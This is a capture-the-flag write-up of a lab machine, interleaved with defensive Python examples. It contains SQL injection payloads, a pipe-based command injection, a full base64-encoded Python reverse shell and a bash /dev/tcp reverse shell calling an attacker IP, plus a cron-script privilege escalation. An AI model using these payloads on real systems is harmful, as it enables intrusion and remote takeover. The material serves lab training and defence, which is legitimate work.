Minotaur's Labyrinth

Target IP: 10.10.141.146
Challenge Description:

[Screenshot: challenge description]


Reconnaissance

[Screenshot: nmap scan showing four open TCP ports]
There are four TCP ports open on the target machine according to the nmap scan. I used the command sudo nmap -sS 10.10.141.146 -p- to accomplish this.

[Screenshot: nmap service and version scan of the four open ports]
Performing an aggressive port scan using the command sudo nmap -sV -A 10.10.141.146 -p 21,80,443,3306 against the four TCP ports returns the result above. This scan returned interesting information: the FTP service allows anonymous login, the HTTP and HTTPS applications sit on their standard port numbers, and a MySQL service is listening on port 3306. I will begin enumeration with the FTP service on port 21 first.


Enumeration

Port 21: FTP
[Screenshot: anonymous FTP login and listing of the pub directory]
Using the command ftp 10.10.141.146, I connected to the FTP service on the target machine with the anonymous login. I used the command ls -la to view the contents of this directory. There is a directory with the name pub that is accessible. Within this directory, there is a text file with the name message.txt and another directory with the name .secret. I downloaded the file message.txt to my machine using the command get.

[Screenshot: contents of the .secret directory]
Inside the .secret directory, there are two more text files: flag.txt and keep_in_mind.txt. I transferred these files to my machine too using the command get. The flag.txt is possibly the first flag of this challenge.

Port 80: HTTP
[Screenshot: login page of the web application on port 80]
The login webpage above is displayed for this web application. Since I do not have the login credentials, I will need to enumerate further. The source code of this webpage is interesting. I am able to view the JavaScript code for this login webpage. The file name is login.js.

[Screenshot: source of login.js with the pwdgen() function]
The code of login.js is shown above. The function pwdgen() seems to generate the password for the user Daedalus. Since it is using char arrays, it is easy to obtain the password by indexing.

[Screenshot: Python IDLE session reconstructing the password]
I used Python IDLE to obtain the password g2e55kh4ck5r, as shown above. I pasted the three character arrays and joined the indexed characters into a string.

[Screenshot: login form with the Daedalus credentials]
Maybe I can use Daedalus:g2e55kh4ck5r against the login webpage.

[Screenshot: application page after logging in as Daedalus]
And bingo! The webpage above was presented to me after logging in successfully using the credentials Daedalus:g2e55kh4ck5r. By the looks of it, the application seems to be pulling some sort of data from a backend database, probably the MySQL application on port 3306. Maybe it is vulnerable to SQL injection? Time to enumerate further.

[Screenshot: UNION-based injection returning database, user and version]
I identified that the query uses 3 columns. The web application throws the error No callback if the payload ' ORDER BY 4-- // is used, so 3 columns is the sweet spot. Using the payload ' UNION SELECT null, database(), user(), @@VERSION -- //, I managed to identify more information about the web application, such as the host and the version, as shown above.

[Screenshot: table and column names from information_schema.columns]
Using the payload ' UNION SELECT table_name, column_name, table_schema from information_schema.columns where table_schema=database() -- //, I identified the two table names: creatures and people as shown above. These two tables seem to be storing some sort of username and password. Maybe I can obtain it?

[Screenshot: dump of the people table]
Using the SQL injection payload ' OR 1=1-- //, I managed to dump the contents of the people table as shown above. I obtained the usernames and password hashes for all users from the table people. The last user seems the most interesting to me, as its naming convention is different.
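Why the payloads above work, and what closes the hole, as an added Python example that is not part of this writeup or the challenge: the people table, its rows and the placeholder hashes are constructed here, and an in-memory SQLite database stands in for the MySQL backend. The same ' OR 1=1-- // input dumps every row through the string-concatenated query and returns nothing through the parameterized one, because the driver sends a bound value as data rather than as SQL text.

```python
import sqlite3

# Constructed sample rows standing in for the challenge's "people" table.
# Names and hashes are placeholders, not values from the target.
SAMPLE_PEOPLE = [
    ("alice", "hash_alice_placeholder"),
    ("bob", "hash_bob_placeholder"),
    ("minotaur_placeholder", "hash_minotaur_placeholder"),
]


def make_db():
    """Create an in-memory database with a constructed people(name, password) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE people (id INTEGER PRIMARY KEY, name TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO people (name, password) VALUES (?, ?)", SAMPLE_PEOPLE
    )
    return conn


def lookup_vulnerable(conn, name):
    """The injectable pattern: user input is pasted straight into the SQL text.

    With name = "' OR 1=1-- //" the statement becomes
        SELECT name, password FROM people WHERE name = '' OR 1=1-- //'
    so the WHERE clause is always true and the trailing quote is commented out.
    """
    sql = f"SELECT name, password FROM people WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name):
    """The fix: the input is bound as a parameter and can never change the query shape."""
    sql = "SELECT name, password FROM people WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1-- //"
    print("vulnerable   :", lookup_vulnerable(db, payload))   # every row
    print("parameterized:", lookup_parameterized(db, payload))  # no rows
```

The detection side follows from the same behaviour: a lookup endpoint that suddenly returns the whole table for a single-user request, or that emits database error text such as the No callback message for malformed input, is worth alerting on.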

[Screenshot: cracked password hashes]
Using CrackStation, I managed to crack the passwords as shown above.

[Screenshot: application page after logging in as M!n0taur, showing the flag and Secret_Stuff]
Using the credentials M!n0taur:aminotauro, I gained access to the web application as shown above. This user has more privileges on the web application by the looks of it, as the flag & the directory with the name Secret_Stuff is shown above.


Exploitation

[Screenshot: the Secret_Stuff page]
The Secret_Stuff webpage is shown above. It seems to be some sort of command application.

[Screenshot: the application echoing hello world]
Using the web application, I got it to echo the string hello world as shown above. Maybe it is vulnerable to command injection attacks? After multiple tests, I identified the web application is using some sort of filtering to prevent symbols.

[Screenshot: command injection with the payload id|whoami|ls]
One symbol that is not blocked is the pipe |, as shown above. Using the payload id|whoami|ls, I was able to perform command injection and obtain the directory listing of the current directory. Since there is heavy filtering in place, I can encode a reverse shell payload in base64 and get the target machine to execute it.

[Screenshot: reverse shell caught as the daemon user]
Gaining a foothold was simple too. I used a base64 encoded Python reverse shell for this. I noticed the = symbol is filtered too; therefore, I removed this. The Python base64 encoded reverse shell I used is cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjE0LjU1LjE1MyIsODQ0MykpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vc2giKSc= | base64 -d | bash. Now I have a foothold on the target machine with the session as daemon, as shown above.
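A defender's view of the filtering described above, as an added Python example that is not from this writeup or the challenge application: the denylist, the allowlist pattern and the echo helper are all constructed here. A denylist of symbols lets id|whoami|ls through because | was left off the list, an allowlist of the characters the feature actually needs rejects it, and handing the input to a process as a single argv element means no shell ever parses it (the helper echoes the argument through the Python interpreter so that it runs on any platform).

```python
import re
import subprocess
import sys

# Constructed denylist in the spirit of the filter the challenge app appears to use:
# several shell metacharacters are blocked, but the pipe is forgotten.
DENYLIST = set(";&$`<>()={}")

# Allowlist: only the characters an "echo a greeting" feature actually needs.
ALLOWED = re.compile(r"^[A-Za-z0-9 ,.!?_-]{1,64}$")


def denylist_filter(user_input):
    """Return True if the input passes the (incomplete) denylist.

    Anything not explicitly listed, such as '|', is accepted, which is why
    denylists of shell syntax keep failing.
    """
    return not any(ch in DENYLIST for ch in user_input)


def allowlist_filter(user_input):
    """Return True only if every character is explicitly permitted."""
    return ALLOWED.fullmatch(user_input) is not None


def echo_safely(user_input):
    """Echo the input without a shell: it travels as one argv element.

    The child process receives the literal string; metacharacters such as
    '|' have no meaning because nothing tokenizes the input as a command line.
    """
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", user_input],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout


if __name__ == "__main__":
    for sample in ("hello world", "id|whoami|ls"):
        print(
            f"{sample!r}: denylist={denylist_filter(sample)} "
            f"allowlist={allowlist_filter(sample)} echoed={echo_safely(sample)!r}"
        )
```

For detection, the same allowlist pattern applied to request logs of the Secret_Stuff endpoint flags every request the feature should never have received, whether or not the filter in the application caught it.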


Privilege Escalation

[Screenshot: the reminders directory and dontforget.txt]
During enumeration, I identified a directory with the name reminders as shown above. This directory has a text file with the name dontforget.txt. Is this the clue that I obtained from previous enumeration at FTP? Is this a cronjob?

[Screenshot: the timers directory and the writable timer.sh]
I found another weird directory with the name timers. This directory has a script with the name timer.sh. This script is responsible for adding the string entries to the dontforget.txt text file. Since I have write permissions over the timer.sh, can I place a reverse shell code here?

[Screenshot: root reverse shell caught on port 8444]
And bingo! Now I have a root reverse shell connection from the target machine on my machine at port 8444. I inserted the bash reverse shell /bin/bash -i >& /dev/tcp/10.14.55.153/8444 0>&1 into the timer.sh file using the echo command echo '/bin/bash -i >& /dev/tcp/10.14.55.153/8444 0>&1' >> timer.sh. Then I started a listener on my machine at port 8444. In the image above, I insert the bash reverse shell in the top terminal and catch the reverse shell in the bottom terminal. GG.
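The root cause of the escalation above is a script that runs with root privileges but can be edited by a low-privilege account. An added Python example, not part of this writeup: an audit that flags scripts in a scheduled-task directory which are group- or world-writable, or which are not owned by a trusted account at all. The ScriptInfo type, the sample entries and the timers/ paths are constructed here.

```python
import os
import stat
from collections import namedtuple

# One record per file: path, permission bits (stat.S_IMODE), owner uid.
ScriptInfo = namedtuple("ScriptInfo", "path mode uid")


def writable_by_others(info, trusted_uids=(0,)):
    """True if someone other than a trusted owner can modify the script.

    A script owned by an untrusted user is always a problem when root runs it,
    regardless of its mode bits; a trusted owner's script is a problem only
    if group or world write is set.
    """
    if info.uid not in trusted_uids:
        return True
    return bool(info.mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(entries, trusted_uids=(0,)):
    """Return the paths of every entry that fails writable_by_others."""
    return [e.path for e in entries if writable_by_others(e, trusted_uids)]


def scan_directory(directory, trusted_uids=(0,)):
    """Build ScriptInfo records for the regular files in a directory and audit them."""
    entries = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.stat(path)
        if stat.S_ISREG(st.st_mode):
            entries.append(ScriptInfo(path, stat.S_IMODE(st.st_mode), st.st_uid))
    return audit(entries, trusted_uids)


# Constructed sample entries modelled on the challenge: a root-owned timer.sh
# that anyone can write, a correctly locked-down sibling, a group-writable one
# and a script owned by an ordinary user.
SAMPLE_ENTRIES = [
    ScriptInfo("timers/timer.sh", 0o777, 0),
    ScriptInfo("timers/rotate.sh", 0o755, 0),
    ScriptInfo("timers/group.sh", 0o775, 0),
    ScriptInfo("timers/user.sh", 0o700, 1000),
]


if __name__ == "__main__":
    for path in audit(SAMPLE_ENTRIES):
        print("writable by a non-root principal:", path)
```

Run scan_directory against the directory a cron entry points to, on a schedule, and diff the result against the previous run; the fix for each finding is the usual one of root ownership with mode 0755 or tighter.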


Flags

[Screenshot: first flag]
The first flag is shown above. This flag is obtainable from the FTP application via anonymous login.

[Screenshot: second flag]
The second flag is shown above. The flag is next to the circle in the image above.

[Screenshot: user flag]
The user flag is shown above.

[Screenshot: root flag]
The root flag is shown above.